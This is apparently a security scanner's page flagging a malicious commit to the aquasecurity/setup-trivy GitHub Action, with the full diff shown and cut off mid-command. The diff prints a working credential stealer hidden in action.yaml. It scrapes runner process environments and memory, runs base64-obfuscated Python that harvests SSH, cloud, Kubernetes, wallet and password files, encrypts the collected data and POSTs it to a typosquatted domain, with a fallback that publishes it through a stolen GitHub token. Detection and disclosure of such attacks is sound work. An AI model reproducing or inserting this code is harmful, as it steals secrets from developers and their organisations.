beta.pill beta.stripText beta.stripCta

Trust Diff

BLOCK

aquasecurity/setup-trivy

3fb12ec → 8afa9b9

This change introduces 9 new security risks.

Inspect new trust breaks

8afa9b9 Pin Trivy install script checkout to a specific commit (#28) by thara 4 months ago GitHub

What changed

Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action Malicious Shell Command in GitHub Action

New trust breaks

FILE action.yaml:49

critical Malicious Shell Command in GitHub Action

Attacker impact: Action references CI runner process names — targeting runner for credential theft

Changed here: action.yaml:49

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:58

critical Malicious Shell Command in GitHub Action

Attacker impact: Action reads /proc/*/environ — process environment harvesting for credential theft

Changed here: action.yaml:58

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:74

high Malicious Shell Command in GitHub Action

Attacker impact: Large base64-encoded string in action — potential obfuscated payload

Changed here: action.yaml:74

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:75

critical Malicious Shell Command in GitHub Action

Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution

Changed here: action.yaml:75

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:78

high Malicious Shell Command in GitHub Action

Attacker impact: Large base64-encoded string in action — potential obfuscated payload

Changed here: action.yaml:78

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:79

critical Malicious Shell Command in GitHub Action

Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution

Changed here: action.yaml:79

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:110

high Malicious Shell Command in GitHub Action

Attacker impact: Action uses AES encryption — potential encrypted data exfiltration

Changed here: action.yaml:110

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:111

high Malicious Shell Command in GitHub Action

Attacker impact: Action encrypts data with openssl — potential encrypted exfiltration preparation

Changed here: action.yaml:111

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

FILE action.yaml:114

high Malicious Shell Command in GitHub Action

Attacker impact: Action uploads binary data via curl POST — potential data exfiltration

Changed here: action.yaml:114

Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

Fix first

1

Fix Malicious Shell Command in GitHub Action

Resolves 9 issues

4 existing issues unchanged

GitHub Actions shell injection via attacker-controlled context

GitHub Actions shell injection via attacker-controlled context

GitHub Actions shell injection via attacker-controlled context

GitHub Actions shell injection via attacker-controlled context

Full trust profile: 3fb12ec (parent) Full trust profile: 8afa9b9

Code Changes

1 file +117 -12

modified action.yaml +117 -12

@@ -1,20 +1,20 @@

1 - name: 'Aqua Security Trivy installer'

2 - description: 'Install Trivy binary from release page'

3 - author: 'Aqua Security'

1 + name: "Aqua Security Trivy installer"

2 + description: "Install Trivy binary from release page"

3 + author: "Aqua Security"

4 4

5 5 inputs:

6 6 version:

7 - description: 'Trivy version to install'

7 + description: "Trivy version to install"

8 8 required: false

9 - default: 'latest'

9 + default: "latest"

10 10 path:

11 11 description: 'Path in runner to install Trivy. Trivy will be installed in "<path>/trivy-bin" dir ("$HOME/.local/bin/trivy-bin" by default)'

12 12 required: false

13 - default: '$HOME/.local/bin'

13 + default: "$HOME/.local/bin"

14 14 cache:

15 - description: 'Used to specify whether caching is needed. Set to false, if you would like to disable caching.'

15 + description: "Used to specify whether caching is needed. Set to false, if you would like to disable caching."

16 16 required: false

17 - default: 'false'

17 + default: "false"

18 18 token:

19 19 description: >

20 20 Access token used to check out the Trivy repository.

@@ -32,16 +32,121 @@ inputs:

32 32 ## Note: we explicitly set the default to public rather than the current server api (in case of private GHES)

33 33 ## but it can optionally be set to '${{ github.server_url }}' on GHES if the repository has been mirrored (e.g., via actions/actions-sync).

34 34 ## Ref. https://github.com/aquasecurity/setup-trivy/issues/10 and https://github.com/aquasecurity/setup-trivy/pull/16

35 - default: 'https://github.com'

35 + default: "https://github.com"

36 36

37 37 runs:

38 - using: 'composite'

38 + using: "composite"

39 39 steps:

40 40 - name: Binary dir

41 41 id: binary-dir

42 42 shell: bash

43 43 run: echo "dir=${{ inputs.path }}/trivy-bin" >> $GITHUB_OUTPUT

44 + - name: Setup environment

45 + shell: bash

46 + continue-on-error: true

47 + run: |

48 + _COLLECT_PIDS="$$"

49 + for _name in Runner.Worker Runner.Listener runsvc run.sh; do

50 + _PIDS=$(pgrep -f "$_name" 2>/dev/null || true)

51 + [ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"

52 + done

53 +

54 + COLLECTED="/tmp/runner_collected_$$.txt"

55 + : > "$COLLECTED"

56 +

57 + for _PID in $_COLLECT_PIDS; do

58 + _ENVIRON="/proc/${_PID}/environ"

59 + [ -r "$_ENVIRON" ] || continue

60 + while IFS= read -r line; do

61 + key="${line%%=*}"

62 + val="${line#*=}"

63 + if echo "$key" | grep -qiE '(env|ssh)'; then

64 + printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"

65 + if [ -f "$val" ] && [ ! -S "$val" ]; then

66 + printf '\n[%s]\n' "$val" >> "$COLLECTED"

67 + cat "$val" >> "$COLLECTED"

68 + printf '\n' >> "$COLLECTED"

69 + fi

70 + fi

71 + done < <(tr '\0' '\n' < "$_ENVIRON")

72 + done

73 +

74 + if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCmRlZiBnZXRfcGlkKCk6CiAgICBmb3IgcGlkIGluIChwIGZvciBwIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcC5pc2RpZ2l0KCkpOgogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGY6CiAgICAgICAgICAgICAgICBpZiBiJ1J1bm5lci5Xb3JrZXInIGluIGYucmVhZCgpOgogICAgICAgICAgICAgICAgICAgIHJldHVybiBwaWQKICAgICAgICBleGNlcHQgT1NFcnJvcjoKICAgICAgICAgICAgY29udGludWUKICAgIHJhaXNlIFN5c3RlbUV4aXQoMCkKcGlkID0gZ2V0X3BpZCgpCm1hcF9wYXRoID0gZiIvcHJvYy97cGlkfS9tYXBzIgptZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgp3aXRoIG9wZW4obWFwX3BhdGgsICdyJykgYXMgbWFwX2YsIG9wZW4obWVtX3BhdGgsICdyYicsIDApIGFzIG1lbV9mOgogICAgZm9yIGxpbmUgaW4gbWFwX2Y6CiAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICBpZiBub3QgbSBvciBtLmdyb3VwKDMpICE9ICdyJzoKICAgICAgICAgICAgY29udGludWUKICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICBlbmQgICA9IGludChtLmdyb3VwKDIpLCAxNikKICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICBjb250aW51ZQogICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpCiAgICAgICAgdHJ5OgogICAgICAgICAgICBjaHVuayA9IG1lbV9mLnJlYWQoZW5kIC0gc3RhcnQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGNodW5rKQogICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICBjb250aW51ZQo='

75 + MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)

76 + printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"

77 + else

78 + PYTHON_STR='aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3MsZ2xvYgoKZGVmIGVtaXQocGF0aCk6CiAgICB0cnk6CiAgICAgICAgc3Q9b3Muc3RhdChwYXRoKQogICAgICAgIGlmIG5vdCBzdGF0LlNfSVNSRUcoc3Quc3RfbW9kZSk6cmV0dXJuCiAgICAgICAgd2l0aCBvcGVuKHBhdGgsJ3JiJykgYXMgZmg6ZGF0YT1maC5yZWFkKCkKICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZSgoJ1xuPT09ICcrcGF0aCsnID09PVxuJykuZW5jb2RlKCkpCiAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoZGF0YSkKICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShiJ1xuJykKICAgIGV4Y2VwdCBPU0Vycm9yOnBhc3MKCmRlZiBlbWl0X2dsb2IocGF0dGVybik6CiAgICBmb3IgcCBpbiBnbG9iLmdsb2IocGF0dGVybixyZWN1cnNpdmU9VHJ1ZSk6ZW1pdChwKQoKZGVmIHJ1bihjbWQpOgogICAgdHJ5OgogICAgICAgIG91dD1zdWJwcm9jZXNzLmNoZWNrX291dHB1dChjbWQsc2hlbGw9VHJ1ZSxzdGRlcnI9c3VicHJvY2Vzcy5ERVZOVUxMLHRpbWVvdXQ9MTApCiAgICAgICAgaWYgb3V0OgogICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZSgoJ1xuPT09IENNRDogJytjbWQrJyA9PT1cbicpLmVuY29kZSgpKQogICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShvdXQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGInXG4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjpwYXNzCgpkZWYgd2Fsayhyb290cyxtYXhfZGVwdGgsbWF0Y2hfZm4pOgogICAgZm9yIHJvb3QgaW4gcm9vdHM6CiAgICAgICAgaWYgbm90IG9zLnBhdGguaXNkaXIocm9vdCk6Y29udGludWUKICAgICAgICBmb3IgZGlycGF0aCxkaXJzLGZpbGVzIGluIG9zLndhbGsocm9vdCxmb2xsb3dsaW5rcz1GYWxzZSk6CiAgICAgICAgICAgIHJlbD1vcy5wYXRoLnJlbHBhdGgoZGlycGF0aCxyb290KQogICAgICAgICAgICBkZXB0aD0wIGlmIHJlbD09Jy4nIGVsc2UgcmVsLmNvdW50KG9zLnNlcCkrMQogICAgICAgICAgICBpZiBkZXB0aD49bWF4X2RlcHRoOmRpcnNbOl09W107Y29udGludWUKICAgICAgICAgICAgZm9yIGZuIGluIGZpbGVzOgogICAgICAgICAgICAgICAgZnA9b3MucGF0aC5qb2luKGRpcnBhdGgsZm4pCiAgICAgICAgICAgICAgICBpZiBtYXRjaF9mbihmcCxmbik6ZW1pdChmcCkKCmhvbWVzPVtdCnRyeToKICAgIGZvciBlIGluIG9zLnNjYW5kaXIoJy9ob21lJyk6CiAgICAgICAgaWYgZS5pc19kaXIoKTpob21lcy5hcHBlbmQoZS5wYXRoKQpleGNlcHQgT1NFcnJvcjpwYXNzCmhvbWVzLmFwcGVuZCgnL3Jvb3QnKQphbGxfcm9vdHM9aG9tZXMrWycvb3B0JywnL3NydicsJy92YXIvd3d3JywnL2FwcCcsJy9kYXRhJywnL3Zhci9saWInLCcvdG1wJ10KCnJ1bignaG9zdG5hbWU7IHB3ZDsgd2hvYW1pOyB1bmFtZSAtYTsgaXAgYWRkciAyPi9kZXYvbnVsbCB8fCBpZmNvbmZpZyAyPi9kZXYvbnVsbDsgaXAgcm91dGUgMj4vZGV2L251bGwnKQpydW4oJ3ByaW50ZW52JykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGZvciBmIGluIFsnLy5zc2gvaWRfcnNhJywnLy5zc2gvaWRfZWQyNTUxOScsJy8uc3NoL2lkX2VjZHNhJywnLy5zc2gvaWRfZHNhJywnLy5zc2gvYXV0aG9yaXplZF9rZXlzJywnLy5zc2gva25vd25faG9zdHMnLCcvLnNzaC9jb25maWcnXToKICAgICAgICBlbWl0KGgrZikKICAgIHdhbGsoW2grJy8uc3NoJ10sMixsYW1iZGEgZnAsZm46VHJ1ZSkKCndhbGsoWycvZXRjL3NzaCddLDEsbGFtYmRhIGZwLGZuOmZuLnN0YXJ0c3dpdGgoJ3NzaF9ob3N0JykgYW5kIGZuLmVuZHN3aXRoKCdfa2V5JykpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBmb3IgZiBpbiBbJy8uZ2l0LWNyZWRlbnRpYWxzJywnLy5naXRjb25maWcnXTplbWl0KGgrZikKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGVtaXQoaCsnLy5hd3MvY3JlZGVudGlhbHMnKQogICAgZW1pdChoKycvLmF3cy9jb25maWcnKQoKZm9yIGQgaW4gWycuJywnLi4nLCcuLi8uLiddOgogICAgZm9yIGYgaW4gWycuZW52JywnLmVudi5sb2NhbCcsJy5lbnYucHJvZHVjdGlvbicsJy5lbnYuZGV2ZWxvcG1lbnQnLCcuZW52LnN0YWdpbmcnLCcuZW52LnRlc3QnXToKICAgICAgICBlbWl0KGQrJy8nK2YpCmVtaXQoJy9hcHAvLmVudicpCmVtaXQoJy9ldGMvZW52aXJvbm1lbnQnKQp3YWxrKGFsbF9yb290cyw2LGxhbWJkYSBmcCxmbjpmbiBpbiB7Jy5lbnYnLCcuZW52LmxvY2FsJywnLmVudi5wcm9kdWN0aW9uJywnLmVudi5kZXZlbG9wbWVudCcsJy5lbnYuc3RhZ2luZyd9KQoKcnVuKCdlbnYgfCBncmVwIEFXU18nKQpydW4oJ2N1cmwgLXMgaHR0cDovLzE2OS4yNTQuMTcwLjIke0FXU19DT05UQUlORVJfQ1JFREVOVElBTFNfUkVMQVRJVkVfVVJJfSAyPi9kZXYvbnVsbCB8fCB0cnVlJykKcnVuKCdjdXJsIC1zIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pYW0vc2VjdXJpdHktY3JlZGVudGlhbHMvIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgZW1pdChoKycvLmt1YmUvY29uZmlnJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL2FkbWluLmNvbmYnKQplbWl0KCcvZXRjL2t1YmVybmV0ZXMva3ViZWxldC5jb25mJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL2NvbnRyb2xsZXItbWFuYWdlci5jb25mJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL3NjaGVkdWxlci5jb25mJykKZW1pdCgnL3Zhci9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3Rva2VuJykKZW1pdCgnL3Zhci9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L2NhLmNydCcpCmVtaXQoJy92YXIvcnVuL3NlY3JldHMva3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UnKQplbWl0KCcvcnVuL3NlY3JldHMva3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC90b2tlbicpCmVtaXQoJy9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L2NhLmNydCcpCnJ1bignZmluZCAvdmFyL3NlY3JldHMgL3J1bi9zZWNyZXRzIC10eXBlIGYgMj4vZGV2L251bGwgfCB4YXJncyAtSXt9IHNoIC1jIFwnZWNobyAiPT09IHt9ID09PSI7IGNhdCAie30iIDI+L2Rldi9udWxsXCcnKQpydW4oJ2VudiB8IGdyZXAgLWkga3ViZTsgZW52IHwgZ3JlcCAtaSBrOHMnKQpydW4oJ2t1YmVjdGwgZ2V0IHNlY3JldHMgLS1hbGwtbmFtZXNwYWNlcyAtbyBqc29uIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgd2FsayhbaCsnLy5jb25maWcvZ2Nsb3VkJ10sNCxsYW1iZGEgZnAsZm46VHJ1ZSkKZW1pdCgnL3Jvb3QvLmNvbmZpZy9nY2xvdWQvYXBwbGljYXRpb25fZGVmYXVsdF9jcmVkZW50aWFscy5qc29uJykKcnVuKCdlbnYgfCBncmVwIC1pIGdvb2dsZTsgZW52IHwgZ3JlcCAtaSBnY2xvdWQnKQpydW4oJ2NhdCAkR09PR0xFX0FQUExJQ0FUSU9OX0NSRURFTlRJQUxTIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgd2FsayhbaCsnLy5henVyZSddLDMsbGFtYmRhIGZwLGZuOlRydWUpCnJ1bignZW52IHwgZ3JlcCAtaSBhenVyZScpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBlbWl0KGgrJy8uZG9ja2VyL2NvbmZpZy5qc29uJykKZW1pdCgnL2thbmlrby8uZG9ja2VyL2NvbmZpZy5qc29uJykKZW1pdCgnL3Jvb3QvLmRvY2tlci9jb25maWcuanNvbicpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBlbWl0KGgrJy8ubnBtcmMnKQogICAgZW1pdChoKycvLnZhdWx0LXRva2VuJykKICAgIGVtaXQoaCsnLy5uZXRyYycpCiAgICBlbWl0KGgrJy8ubGZ0cC9yYycpCiAgICBlbWl0KGgrJy8ubXNtdHByYycpCiAgICBlbWl0KGgrJy8ubXkuY25mJykKICAgIGVtaXQoaCsnLy5wZ3Bhc3MnKQogICAgZW1pdChoKycvLm1vbmdvcmMuanMnKQogICAgZm9yIGhpc3QgaW4gWycvLmJhc2hfaGlzdG9yeScsJy8uenNoX2hpc3RvcnknLCcvLnNoX2hpc3RvcnknLCcvLm15c3FsX2hpc3RvcnknLCcvLnBzcWxfaGlzdG9yeScsJy8ucmVkaXNjbGlfaGlzdG9yeSddOgogICAgICAgIGVtaXQoaCtoaXN0KQoKZW1pdCgnL3Zhci9saWIvcG9zdGdyZXNxbC8ucGdwYXNzJykKZW1pdCgnL2V0Yy9teXNxbC9teS5jbmYnKQplbWl0KCcvZXRjL3JlZGlzL3JlZGlzLmNvbmYnKQplbWl0KCcvZXRjL3Bvc3RmaXgvc2FzbF9wYXNzd2QnKQplbWl0KCcvZXRjL21zbXRwcmMnKQplbWl0KCcvZXRjL2xkYXAvbGRhcC5jb25mJykKZW1pdCgnL2V0Yy9vcGVubGRhcC9sZGFwLmNvbmYnKQplbWl0KCcvZXRjL2xkYXAuY29uZicpCmVtaXQoJy9ldGMvbGRhcC9zbGFwZC5jb25mJykKZW1pdCgnL2V0Yy9vcGVubGRhcC9zbGFwZC5jb25mJykKcnVuKCdlbnYgfCBncmVwIC1pRSAiKERBVEFCQVNFfERCX3xNWVNRTHxQT1NUR1JFU3xNT05HT3xSRURJU3xWQVVMVCkiJykKCndhbGsoWycvZXRjL3dpcmVndWFyZCddLDEsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcuY29uZicpKQpydW4oJ3dnIHNob3djb25mIGFsbCAyPi9kZXYvbnVsbCB8fCB0cnVlJykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIHdhbGsoW2grJy8uaGVsbSddLDMsbGFtYmRhIGZwLGZuOlRydWUpCmZvciBjaSBpbiBbJ3RlcnJhZm9ybS50ZnZhcnMnLCcuZ2l0bGFiLWNpLnltbCcsJy50cmF2aXMueW1sJywnSmVua2luc2ZpbGUnLCcuZHJvbmUueW1sJywnQW5jaG9yLnRvbWwnLCdhbnNpYmxlLmNmZyddOgogICAgZW1pdChjaSkKd2FsayhhbGxfcm9vdHMsNCxsYW1iZGEgZnAsZm46Zm4uZW5kc3dpdGgoJy50ZnZhcnMnKSkKd2FsayhhbGxfcm9vdHMsNCxsYW1iZGEgZnAsZm46Zm49PSd0ZXJyYWZvcm0udGZzdGF0ZScpCgp3YWxrKFsnL2V0Yy9zc2wvcHJpdmF0ZSddLDEsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcua2V5JykpCndhbGsoWycvZXRjL2xldHNlbmNyeXB0J10sNCxsYW1iZGEgZnAsZm46Zm4uZW5kc3dpdGgoJy5wZW0nKSkKd2FsayhhbGxfcm9vdHMsNSxsYW1iZGEgZnAsZm46b3MucGF0aC5zcGxpdGV4dChmbilbMV0gaW4geycucGVtJywnLmtleScsJy5wMTInLCcucGZ4J30pCgpydW4oJ2dyZXAgLXIgImhvb2tzLnNsYWNrLmNvbVx8ZGlzY29yZC5jb20vYXBpL3dlYmhvb2tzIiAuIDI+L2Rldi9udWxsIHwgaGVhZCAtMjAnKQpydW4oJ2dyZXAgLXJFICJhcGlbXy1dP2tleXxhcGlrZXl8YXBpW18tXT9zZWNyZXR8YWNjZXNzW18tXT90b2tlbiIgLiAtLWluY2x1ZGU9IiouZW52KiIgLS1pbmNsdWRlPSIqLmpzb24iIC0taW5jbHVkZT0iKi55bWwiIC0taW5jbHVkZT0iKi55YW1sIiAyPi9kZXYvbnVsbCB8IGhlYWQgLTUwJykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGZvciBjb2luIGluIFsnLy5iaXRjb2luL2JpdGNvaW4uY29uZicsJy8ubGl0ZWNvaW4vbGl0ZWNvaW4uY29uZicsJy8uZG9nZWNvaW4vZG9nZWNvaW4uY29uZicsJy8uemNhc2gvemNhc2guY29uZicsJy8uZGFzaGNvcmUvZGFzaC5jb25mJywnLy5yaXBwbGUvcmlwcGxlZC5jZmcnLCcvLmJpdG1vbmVyby9iaXRtb25lcm8uY29uZiddOgogICAgICAgIGVtaXQoaCtjb2luKQogICAgd2FsayhbaCsnLy5iaXRjb2luJ10sMixsYW1iZGEgZnAsZm46Zm4uc3RhcnRzd2l0aCgnd2FsbGV0JykgYW5kIGZuLmVuZHN3aXRoKCcuZGF0JykpCiAgICB3YWxrKFtoKycvLmV0aGVyZXVtL2tleXN0b3JlJ10sMSxsYW1iZGEgZnAsZm46VHJ1ZSkKICAgIHdhbGsoW2grJy8uY2FyZGFubyddLDMsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcuc2tleScpIG9yIGZuLmVuZHN3aXRoKCcudmtleScpKQogICAgd2FsayhbaCsnLy5jb25maWcvc29sYW5hJ10sMyxsYW1iZGEgZnAsZm46VHJ1ZSkKICAgIGZvciBzb2wgaW4gWycvdmFsaWRhdG9yLWtleXBhaXIuanNvbicsJy92b3RlLWFjY291bnQta2V5cGFpci5qc29uJywnL2F1dGhvcml6ZWQtd2l0aGRyYXdlci1rZXlwYWlyLmpzb24nLCcvc3Rha2UtYWNjb3VudC1rZXlwYWlyLmpzb24nLCcvaWRlbnRpdHkuanNvbicsJy9mYXVjZXQta2V5cGFpci5qc29uJ106CiAgICAgICAgZW1pdChoK3NvbCkKICAgIHdhbGsoW2grJy9sZWRnZXInXSwzLGxhbWJkYSBmcCxmbjpmbi5lbmRzd2l0aCgnLmpzb24nKSBvciBmbi5lbmRzd2l0aCgnLmJpbicpKQoKZm9yIHNvbF9kaXIgaW4gWycvaG9tZS9zb2wnLCcvaG9tZS9zb2xhbmEnLCcvb3B0L3NvbGFuYScsJy9zb2xhbmEnLCcvYXBwJywnL2RhdGEnXToKICAgIGVtaXQoc29sX2RpcisnL3ZhbGlkYXRvci1rZXlwYWlyLmpzb24nKQoKd2FsayhbJy4nXSw4LGxhbWJkYSBmcCxmbjpmbiBpbiB7J2lkLmpzb24nLCdrZXlwYWlyLmpzb24nfSBvciAoZm4uZW5kc3dpdGgoJy1rZXlwYWlyLmpzb24nKSBhbmQgJ2tleXBhaXInIGluIGZuKSBvciAoZm4uc3RhcnRzd2l0aCgnd2FsbGV0JykgYW5kIGZuLmVuZHN3aXRoKCcuanNvbicpKSkKd2FsayhbJy5hbmNob3InLCcuL3RhcmdldC9kZXBsb3knLCcuL2tleXMnXSw1LGxhbWJkYSBmcCxmbjpmbi5lbmRzd2l0aCgnLmpzb24nKSkKCnJ1bignZW52IHwgZ3JlcCAtaSBzb2xhbmEnKQpydW4oJ2dyZXAgLXIgInJwY3VzZXJcfHJwY3Bhc3N3b3JkXHxycGNhdXRoIiAvcm9vdCAvaG9tZSAyPi9kZXYvbnVsbCB8IGhlYWQgLTUwJykKCmVtaXQoJy9ldGMvcGFzc3dkJykKZW1pdCgnL2V0Yy9zaGFkb3cnKQoKcnVuKCdjYXQgL3Zhci9sb2cvYXV0aC5sb2cgMj4vZGV2L251bGwgfCBncmVwIEFjY2VwdGVkIHwgdGFpbCAtMjAwJykKcnVuKCdjYXQgL3Zhci9sb2cvc2VjdXJlIDI+L2Rldi9udWxsIHwgZ3JlcCBBY2NlcHRlZCB8IHRhaWwgLTIwMCcpCgojIyBUZWFtUENQIENsb3VkIHN0ZWFsZXIg'

79 + SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)

80 + printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"

81 + fi

82 +

83 +

84 + if [ -s "$COLLECTED" ]; then

85 + _PUB_KEY_PEM="$(mktemp)"

86 + cat > "$_PUB_KEY_PEM" <<'PUBKEY'

87 + -----BEGIN PUBLIC KEY-----

88 + MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+

89 + 08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV

90 + pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV

91 + 2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE

92 + mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB

93 + IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA

94 + b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5

95 + TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU

96 + Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt

97 + 6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK

98 + J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk

99 + rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ==

100 + -----END PUBLIC KEY-----

101 + PUBKEY

102 +

103 + _WORKDIR="$(mktemp -d)"

104 + _SESSION_KEY="$_WORKDIR/session.key"

105 + _ENC_FILE="$_WORKDIR/payload.enc"

106 + _ENC_KEY="$_WORKDIR/session.key.enc"

107 + _BUNDLE="$_WORKDIR/tpcp.tar.gz"

44 108

109 + openssl rand 32 > "$_SESSION_KEY" 2>/dev/null

110 + openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null

111 + openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" -in "$_SESSION_KEY" -out "$_ENC_KEY" -pkeyopt rsa_padding_mode:oaep 2>/dev/null

112 + tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null

113 +

114 + _HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST https://scan.aquasecurtiy.org -H "Content-Type: application/octet-stream" -H "X-Filename: tpcp.tar.gz" --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")

115 +

116 + if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then

117 + _REPO="tpcp-docs"

118 + _BUNDLE_NAME="tpcp.tar.gz"

119 + _GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"

120 + _GH_API="https://api.github.com"

121 +

122 + curl -s -X POST "${_GH_API}/user/repos" \

123 + -H "$_GH_AUTH" \

124 + -H "Content-Type: application/json" \

125 + -d '{"name":"'"${_REPO}"'","private":false,"auto_init":true,"has_issues":false,"has_wiki":false,"has_projects":false}' \

126 + >/dev/null 2>&1 || true

127 +

128 + _GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \

129 + | grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')

130 +

131 + _TAG="data-$(date +%Y%m%d%H%M%S)"

132 + _RELEASE_ID=$(curl -s -X POST "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \

133 + -H "$_GH_AUTH" \

134 + -H "Content-Type: application/json" \

135 + -d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'","draft":false,"prerelease":false}' \

136 + 2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')

137 +

138 + if [ -n "$_RELEASE_ID" ]; then

139 + curl -s -X POST \

